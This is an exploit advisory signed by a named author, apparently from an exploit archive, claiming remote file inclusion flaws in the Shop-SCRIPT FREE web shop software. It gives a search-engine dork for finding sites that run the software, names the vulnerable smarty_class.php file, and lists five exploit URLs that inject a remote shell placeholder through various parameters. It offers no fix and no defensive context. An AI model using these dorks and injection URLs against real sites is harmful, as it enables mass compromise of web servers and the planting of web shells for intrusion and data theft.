Shop-SCRIPT FREE suffers from remote file inclusion vulnerabilities.
eac9db017e86d383cd3d3cd68a4aa7a8e48a0472f732fe99f456a508277572c8
By Hasadya Raed
Contact : RaeD@BsdMail.Com
Israel
-----------------------------------------
Script : Shop-SCRIPT FREE
Dork : "Copyright (c) 2004 Articus consulting group. All rights reserved"
-----------------------------------------
B.Files :
smarty_class.php
-----------------------------------------
Exploits :
http://www.Victim.com/path/smarty/smarty_class.php?_smarty_compile_path=[Shell-Attack]
http://www.Victim.com/path/smarty/smarty_class.php?smarty_compile_path=[Shell-Attack]
http://www.Victim.com/path/smarty/smarty_class.php?get_plugin_filepath=[Shell-Attack]
http://www.Victim.com/path/smarty/smarty_class.php?smarty_dir=[Shell-Attack]
http://www.Victim.com/path/smarty/smarty_class.php?filename=[Shell-Attack]
-----------------------------------------
--